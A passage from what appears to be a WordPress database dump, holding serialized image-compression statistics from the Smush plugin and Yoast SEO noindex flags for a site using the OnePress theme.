;i:8890;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1624;s:11:\"size_before\";i:15000;s:10:\"size_after\";i:13376;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4533,54,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.0857802071030295820719402399845421314239501953125;s:5:\"bytes\";i:8072;s:11:\"size_before\";i:72814;s:10:\"size_after\";i:64742;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:291;s:11:\"size_before\";i:2998;s:10:\"size_after\";i:2707;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.5600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:784;s:11:\"size_before\";i:7421;s:10:\"size_after\";i:6637;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.5;s:5:\"bytes\";i:4069;s:11:\"size_before\";i:30149;s:10:\"size_after\";i:26080;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:394;s:11:\"size_before\";i:4721;s:10:\"size_after\";i:4327;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:953;s:11:\"size_before\";i:11001;s:10:\"size_after\";i:10048;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1581;s:11:\"size_before\";i:16524;s:10:\"size_after\";i:14943;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4534,52,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.5852942458904397682317721773870289325714111328125;s:5:\"bytes\";i:7283;s:11:\"size_before\";i:68803;s:10:\"size_after\";i:61520;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:241;s:11:\"size_before\";i:2940;s:10:\"size_after\";i:2699;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:674;s:11:\"size_before\";i:7164;s:10:\"size_after\";i:6490;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:13;s:5:\"bytes\";i:3792;s:11:\"size_before\";i:29172;s:10:\"size_after\";i:25380;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.20999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:312;s:11:\"size_before\";i:4325;s:10:\"size_after\";i:4013;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:8;s:5:\"bytes\";i:800;s:11:\"size_before\";i:9996;s:10:\"size_after\";i:9196;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.6300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1464;s:11:\"size_before\";i:15206;s:10:\"size_after\";i:13742;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4535,51,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.6116812198274725886903979699127376079559326171875;s:5:\"bytes\";i:7287;s:11:\"size_before\";i:75814;s:10:\"size_after\";i:68527;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.550000000000000710542735760100185871124267578125;s:5:\"bytes\";i:269;s:11:\"size_before\";i:3146;s:10:\"size_after\";i:2877;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:694;s:11:\"size_before\";i:7727;s:10:\"size_after\";i:7033;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.0600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:3773;s:11:\"size_before\";i:31291;s:10:\"size_after\";i:27518;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.38999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:318;s:11:\"size_before\";i:4975;s:10:\"size_after\";i:4657;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:817;s:11:\"size_before\";i:11409;s:10:\"size_after\";i:10592;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1416;s:11:\"size_before\";i:17266;s:10:\"size_after\";i:15850;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4536,49,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.275501283172115307706917519681155681610107421875;s:5:\"bytes\";i:6578;s:11:\"size_before\";i:70918;s:10:\"size_after\";i:64340;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:206;s:11:\"size_before\";i:3090;s:10:\"size_after\";i:2884;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:590;s:11:\"size_before\";i:7452;s:10:\"size_after\";i:6862;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.8800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:3555;s:11:\"size_before\";i:29934;s:10:\"size_after\";i:26379;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:263;s:11:\"size_before\";i:4505;s:10:\"size_after\";i:4242;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.62999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:684;s:11:\"size_before\";i:10317;s:10:\"size_after\";i:9633;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.1899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:1280;s:11:\"size_before\";i:15620;s:10:\"size_after\";i:14340;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4537,48,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.703848790520027023376314900815486907958984375;s:5:\"bytes\";i:7110;s:11:\"size_before\";i:81688;s:10:\"size_after\";i:74578;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.21999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:246;s:11:\"size_before\";i:3405;s:10:\"size_after\";i:3159;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:700;s:11:\"size_before\";i:8435;s:10:\"size_after\";i:7735;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.8800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:3652;s:11:\"size_before\";i:33580;s:10:\"size_after\";i:29928;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:334;s:11:\"size_before\";i:5434;s:10:\"size_after\";i:5100;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.5;s:5:\"bytes\";i:800;s:11:\"size_before\";i:12300;s:10:\"size_after\";i:11500;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1378;s:11:\"size_before\";i:18534;s:10:\"size_after\";i:17156;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4538,46,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.328653893668157337515367544256150722503662109375;s:5:\"bytes\";i:7416;s:11:\"size_before\";i:89042;s:10:\"size_after\";i:81626;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.36000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:259;s:11:\"size_before\";i:3518;s:10:\"size_after\";i:3259;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.78000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:695;s:11:\"size_before\";i:8933;s:10:\"size_after\";i:8238;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:3790;s:11:\"size_before\";i:36471;s:10:\"size_after\";i:32681;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:359;s:11:\"size_before\";i:5916;s:10:\"size_after\";i:5557;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:859;s:11:\"size_before\";i:13520;s:10:\"size_after\";i:12661;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.03000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:1454;s:11:\"size_before\";i:20684;s:10:\"size_after\";i:19230;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4539,1371,'_yoast_wpseo_meta-robots-noindex','1'),(4540,1370,'_yoast_wpseo_meta-robots-noindex','1'),(4541,45,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.1386307289574641998797233100049197673797607421875;s:5:\"bytes\";i:6598;s:11:\"size_before\";i:72199;s:10:\"size_after\";i:65601;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.62999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:207;s:11:\"size_before\";i:3122;s:10:\"size_after\";i:2915;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:588;s:11:\"size_before\";i:7577;s:10:\"size_after\";i:6989;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.7200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:3568;s:11:\"size_before\";i:30453;s:10:\"size_after\";i:26885;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.70999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:263;s:11:\"size_before\";i:4607;s:10:\"size_after\";i:4344;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.62999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:698;s:11:\"size_before\";i:10535;s:10:\"size_after\";i:9837;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1274;s:11:\"size_before\";i:15905;s:10:\"size_after\";i:14631;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4542,1374,'_yoast_wpseo_meta-robots-noindex','1'),(4543,1375,'_yoast_wpseo_meta-robots-noindex','1'),(4544,1376,'_yoast_wpseo_meta-robots-noindex','1'),(4545,1378,'_yoast_wpseo_meta-robots-noindex','1'),(4546,1379,'_yoast_wpseo_meta-robots-noindex','1'),(4547,44,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.795030740307911543141017318703234195709228515625;s:5:\"bytes\";i:8145;s:11:\"size_before\";i:59043;s:10:\"size_after\";i:50898;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:267;s:11:\"size_before\";i:2667;s:10:\"size_after\";i:2400;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:695;s:11:\"size_before\";i:6225;s:10:\"size_after\";i:5530;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.85000000000000142108547152020037174224853515625;s:5:\"bytes\";i:4252;s:11:\"size_before\";i:25235;s:10:\"size_after\";i:20983;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:364;s:11:\"size_before\";i:3706;s:10:\"size_after\";i:3342;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:909;s:11:\"size_before\";i:8343;s:10:\"size_after\";i:7434;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:1658;s:11:\"size_before\";i:12867;s:10:\"size_after\";i:11209;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4548,1380,'_yoast_wpseo_meta-robots-noindex','1'),(4549,1382,'_yoast_wpseo_meta-robots-nofollow','1'),(4550,1383,'_yoast_wpseo_meta-robots-noindex','1'),(4551,1631,'_yoast_wpseo_meta-robots-noindex','1'),(4552,43,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.2980916545122500593834047322161495685577392578125;s:5:\"bytes\";i:9218;s:11:\"size_before\";i:81589;s:10:\"size_after\";i:72371;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.0299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:335;s:11:\"size_before\";i:3339;s:10:\"size_after\";i:3004;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:853;s:11:\"size_before\";i:8202;s:10:\"size_after\";i:7349;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:4494;s:11:\"size_before\";i:33256;s:10:\"size_after\";i:28762;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:519;s:11:\"size_before\";i:5489;s:10:\"size_after\";i:4970;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1135;s:11:\"size_before\";i:12391;s:10:\"size_after\";i:11256;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.949999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1882;s:11:\"size_before\";i:18912;s:10:\"size_after\";i:17030;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4553,1636,'_yoast_wpseo_meta-robots-noindex','1'),(4554,1635,'_yoast_wpseo_meta-robots-noindex','1'),(4555,39,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.386036123863373603626314434222877025604248046875;s:5:\"bytes\";i:7552;s:11:\"size_before\";i:56417;s:10:\"size_after\";i:48865;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:235;s:11:\"size_before\";i:2408;s:10:\"size_after\";i:2173;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:631;s:11:\"size_before\";i:5663;s:10:\"size_after\";i:5032;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:3967;s:11:\"size_before\";i:23914;s:10:\"size_after\";i:19947;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:353;s:11:\"size_before\";i:3543;s:10:\"size_after\";i:3190;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:10;s:5:\"bytes\";i:815;s:11:\"size_before\";i:8150;s:10:\"size_after\";i:7335;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1551;s:11:\"size_before\";i:12739;s:10:\"size_after\";i:11188;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4556,38,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.0183609694831119441005284897983074188232421875;s:5:\"bytes\";i:8038;s:11:\"size_before\";i:66881;s:10:\"size_after\";i:58843;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:228;s:11:\"size_before\";i:2655;s:10:\"size_after\";i:2427;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.1899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:643;s:11:\"size_before\";i:6311;s:10:\"size_after\";i:5668;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:4251;s:11:\"size_before\";i:28061;s:10:\"size_after\";i:23810;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:346;s:11:\"size_before\";i:4301;s:10:\"size_after\";i:3955;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:897;s:11:\"size_before\";i:9895;s:10:\"size_after\";i:8998;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1673;s:11:\"size_before\";i:15658;s:10:\"size_after\";i:13985;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4557,36,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.549686837303348330152630296652205288410186767578125;s:5:\"bytes\";i:3619;s:11:\"size_before\";i:141939;s:10:\"size_after\";i:138320;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.75;s:5:\"bytes\";i:159;s:11:\"size_before\";i:4241;s:10:\"size_after\";i:4082;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.689999999999999946709294817992486059665679931640625;s:5:\"bytes\";i:236;s:11:\"size_before\";i:8759;s:10:\"size_after\";i:8523;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:729;s:11:\"size_before\";i:32266;s:10:\"size_after\";i:31537;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.29000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1634;s:11:\"size_before\";i:49672;s:10:\"size_after\";i:48038;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:206;s:11:\"size_before\";i:7459;s:10:\"size_after\";i:7253;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.4699999999999999733546474089962430298328399658203125;s:5:\"bytes\";i:231;s:11:\"size_before\";i:15722;s:10:\"size_after\";i:15491;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.7800000000000000266453525910037569701671600341796875;s:5:\"bytes\";i:424;s:11:\"size_before\";i:23820;s:10:\"size_after\";i:23396;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4558,2073,'_yoast_wpseo_meta-robots-noindex','1'),(4559,35,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.37507531437678576224925564019940793514251708984375;s:5:\"bytes\";i:3666;s:11:\"size_before\";i:154353;s:10:\"size_after\";i:150687;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:237;s:11:\"size_before\";i:4750;s:10:\"size_after\";i:4513;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.25;s:5:\"bytes\";i:302;s:11:\"size_before\";i:9292;s:10:\"size_after\";i:8990;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.75;s:5:\"bytes\";i:608;s:11:\"size_before\";i:34794;s:10:\"size_after\";i:34186;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1421;s:11:\"size_before\";i:55786;s:10:\"size_after\";i:54365;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:315;s:11:\"size_before\";i:7692;s:10:\"size_after\";i:7377;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:2;s:5:\"bytes\";i:332;s:11:\"size_before\";i:16562;s:10:\"size_after\";i:16230;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.770000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:451;s:11:\"size_before\";i:25477;s:10:\"size_after\";i:25026;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4560,34,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.690377757439959882646007827133871614933013916015625;s:5:\"bytes\";i:5115;s:11:\"size_before\";i:190122;s:10:\"size_after\";i:185007;s:4:\"time\";d:0.1399999999999999855671006798729649744927883148193359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":